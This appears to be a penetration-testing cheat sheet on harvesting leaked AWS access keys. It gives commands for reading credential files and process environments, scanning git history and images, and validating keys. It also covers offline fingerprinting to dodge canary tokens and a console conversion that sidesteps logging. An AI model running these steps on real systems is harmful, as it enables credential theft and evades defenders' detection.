A long-term access key is an AKIA-prefixed ID and its secret. Unlike role credentials they do not expire, so a key found once keeps working until it is rotated or disabled. They leak constantly into files, environment variables, CI configuration, and committed source, which makes grepping for them one of the highest-yield moves on any foothold.
Where they sit on a host#
cat ~/.aws/credentials ~/.aws/config 2>/dev/null
env | grep -i AWS_ # AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY
cat /proc/*/environ 2>/dev/null | tr '\0' '\n' | grep AWS_
In source and history#
# live tree and full git history
trufflehog filesystem . ; trufflehog git file://.
gitleaks detect --source . -v
# Docker images bake keys into layers
trufflehog docker --image <image:tag>
Using and triaging a key#
export AWS_ACCESS_KEY_ID=AKIA... AWS_SECRET_ACCESS_KEY=...
aws sts get-caller-identity # whose key is it, which account
Prefixes and offline fingerprinting#
An AKIA prefix is a long-term key; an ASIA prefix is temporary and also needs the session token (see STS tokens). The 12-digit account ID is encoded in the key ID itself, so it can be recovered without calling AWS:
import base64
def akid_to_account(akid): # AKIA.../ASIA... -> account id
raw = base64.b32decode(akid[4:].upper())[:6]
n = int.from_bytes(raw, "big")
return (n & 0x7fffffffff80) >> 7
The offline step matters for spotting a canary: Thinkst and AWS canary-token keys live in known account IDs, and a single sts:GetCallerIdentity against one fires the defender's alert. Fingerprint the account first, and only touch AWS once the key looks real.
To the console#
CLI credentials convert into a browser session, which survives as a signed-in console tab and sidesteps CLI-specific logging:
aws_consoler -a AKIA... -s <secret> # prints a federated console sign-in URL
Exploitation notes#
- An
ASIAprefix is a temporary key and also needsAWS_SESSION_TOKEN; see STS tokens. - Keys in git history survive a later deletion commit, so always scan the full history, not just the checkout.
- Once validated, resolve the principal's rights with identity enumeration before acting.
Tools#
- TruffleHog / Gitleaks: secret scanning across filesystem, git, and images.
- AWS CLI (
sts get-caller-identity): validate and attribute a key. - aws_consoler (NetSPI): turn CLI credentials into a console sign-in URL.